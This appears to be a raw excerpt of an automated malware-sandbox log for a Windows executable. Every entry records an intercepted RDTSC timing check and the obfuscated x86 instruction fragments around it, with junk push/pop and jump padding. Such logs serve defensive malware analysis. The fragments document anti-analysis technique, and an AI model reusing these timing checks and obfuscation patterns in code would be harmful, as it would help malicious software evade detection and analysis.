Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39CD second address: 8E39DD instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBACB2D116h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39DD second address: 8E39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E3CA8 second address: 8E3CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E3CB4 second address: 8E3CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E3E1F second address: 8E3E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4392 second address: 8E4396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4660 second address: 8E467F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBACB2D128h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E467F second address: 8E4699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FCBAD522AA6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4699 second address: 8E469D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E469D second address: 8E46B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBAD522AB4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4805 second address: 8E4822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBACB2D127h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EA8C2 second address: 8EA8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC367 second address: 8EC373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC373 second address: 8EC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC378 second address: 8EC3B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FCBACB2D124h 0x00000012 jno 00007FCBACB2D116h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBACB2D120h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC3B8 second address: 8EC3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80D2F7 second address: 80D2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F2044B second address: 4F20450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20450 second address: 4F20456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20456 second address: 4F2045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F2045A second address: 4F2045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F2045E second address: 4F204CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, 7527h 0x0000000f pushfd 0x00000010 jmp 00007FCBAD522AACh 0x00000015 jmp 00007FCBAD522AB5h 0x0000001a popfd 0x0000001b popad 0x0000001c mov edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, 0E98871Eh 0x00000027 pushfd 0x00000028 jmp 00007FCBAD522AAFh 0x0000002d sub cx, F3CEh 0x00000032 jmp 00007FCBAD522AB9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F204CC second address: 4F204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F204D2 second address: 4F204D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20509 second address: 4F20524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20524 second address: 4F2052A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F405FD second address: 4F40635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov esi, edi 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edi, ecx 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FCBACB2D11Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40635 second address: 4F4063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4063B second address: 4F4063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4063F second address: 4F4065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, 5B848465h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4065F second address: 4F40676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBACB2D11Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40676 second address: 4F406B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBAD522AB7h 0x00000009 jmp 00007FCBAD522AB3h 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406B2 second address: 4F406C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406C0 second address: 4F406D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 014F76E4h 0x00000008 movsx edi, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406D5 second address: 4F406D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406D9 second address: 4F406DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406DF second address: 4F406F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D11Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406F2 second address: 4F4071E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ecx, 26688D47h 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCBAD522AB5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4071E second address: 4F40724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40724 second address: 4F40728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40728 second address: 4F4075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007FCBACB2D11Fh 0x00000010 nop 0x00000011 pushad 0x00000012 jmp 00007FCBACB2D124h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4075B second address: 4F4077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, si 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBAD522AB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4077D second address: 4F407B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBACB2D11Eh 0x00000015 adc ah, 00000078h 0x00000018 jmp 00007FCBACB2D11Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F407DB second address: 4F407E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F407E1 second address: 4F407E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4086E second address: 4F4087D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4087D second address: 4F408BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c mov ax, B593h 0x00000010 jmp 00007FCBACB2D128h 0x00000015 popad 0x00000016 pop esi 0x00000017 pushad 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F408BF second address: 4F30199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 leave 0x0000000a pushad 0x0000000b mov si, di 0x0000000e pushfd 0x0000000f jmp 00007FCBAD522AADh 0x00000014 sub ecx, 5FE657B6h 0x0000001a jmp 00007FCBAD522AB1h 0x0000001f popfd 0x00000020 popad 0x00000021 retn 0004h 0x00000024 nop 0x00000025 cmp eax, 00000000h 0x00000028 setne al 0x0000002b jmp 00007FCBAD522AA2h 0x0000002d xor ebx, ebx 0x0000002f test al, 01h 0x00000031 jne 00007FCBAD522AA7h 0x00000033 sub esp, 04h 0x00000036 mov dword ptr [esp], 0000000Dh 0x0000003d call 00007FCBB1E20207h 0x00000042 mov edi, edi 0x00000044 jmp 00007FCBAD522AB0h 0x00000049 xchg eax, ebp 0x0000004a pushad 0x0000004b mov di, ax 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FCBAD522AB0h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30199 second address: 4F3019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3019D second address: 4F301A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301A3 second address: 4F301B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D11Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301B4 second address: 4F301B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301B8 second address: 4F301EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FCBACB2D11Dh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FCBACB2D11Eh 0x00000015 sub esp, 2Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FCBACB2D11Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301EF second address: 4F301FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301FE second address: 4F30204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30204 second address: 4F30208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30208 second address: 4F3022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBACB2D128h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3022C second address: 4F30285 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, edi 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d jmp 00007FCBAD522AB9h 0x00000012 xchg eax, edi 0x00000013 jmp 00007FCBAD522AAEh 0x00000018 push eax 0x00000019 jmp 00007FCBAD522AABh 0x0000001e xchg eax, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FCBAD522AB5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30285 second address: 4F30295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D11Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30295 second address: 4F30299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3030E second address: 4F30312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30312 second address: 4F30318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30318 second address: 4F30392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D120h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov dl, cl 0x0000000e popad 0x0000000f je 00007FCBACB2D2F8h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FCBACB2D122h 0x0000001c and ax, 4618h 0x00000021 jmp 00007FCBACB2D11Bh 0x00000026 popfd 0x00000027 jmp 00007FCBACB2D128h 0x0000002c popad 0x0000002d lea ecx, dword ptr [ebp-14h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FCBACB2D127h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30392 second address: 4F30398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30398 second address: 4F3039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3039C second address: 4F303A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30403 second address: 4F30407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30407 second address: 4F30418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30569 second address: 4F30598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBACB2D11Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30598 second address: 4F305CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBAD522AB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305CA second address: 4F305CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305CE second address: 4F305D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305D4 second address: 4F305DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305DA second address: 4F305DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305DE second address: 4F3068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 call 00007FCBACB2D11Ah 0x00000015 push ecx 0x00000016 pop edx 0x00000017 pop ecx 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007FCBACB2D11Dh 0x0000001f nop 0x00000020 jmp 00007FCBACB2D11Eh 0x00000025 push eax 0x00000026 pushad 0x00000027 mov ecx, edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBACB2D123h 0x00000030 sub cl, 0000004Eh 0x00000033 jmp 00007FCBACB2D129h 0x00000038 popfd 0x00000039 mov eax, 660DAC57h 0x0000003e popad 0x0000003f popad 0x00000040 nop 0x00000041 jmp 00007FCBACB2D11Ah 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBACB2D127h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30059 second address: 4F3005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3005E second address: 4F30064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30064 second address: 4F30068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30068 second address: 4F300B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBACB2D123h 0x00000015 jmp 00007FCBACB2D123h 0x0000001a popfd 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300B6 second address: 4F300BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300BC second address: 4F300C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300C0 second address: 4F300C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300C4 second address: 4F30131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e mov dh, ah 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007FCBACB2D11Ch 0x00000017 mov dword ptr [esp], ecx 0x0000001a jmp 00007FCBACB2D120h 0x0000001f mov dword ptr [ebp-04h], 55534552h 0x00000026 pushad 0x00000027 call 00007FCBACB2D11Eh 0x0000002c call 00007FCBACB2D122h 0x00000031 pop ecx 0x00000032 pop edi 0x00000033 call 00007FCBACB2D120h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A58 second address: 4F30A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A5C second address: 4F30A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
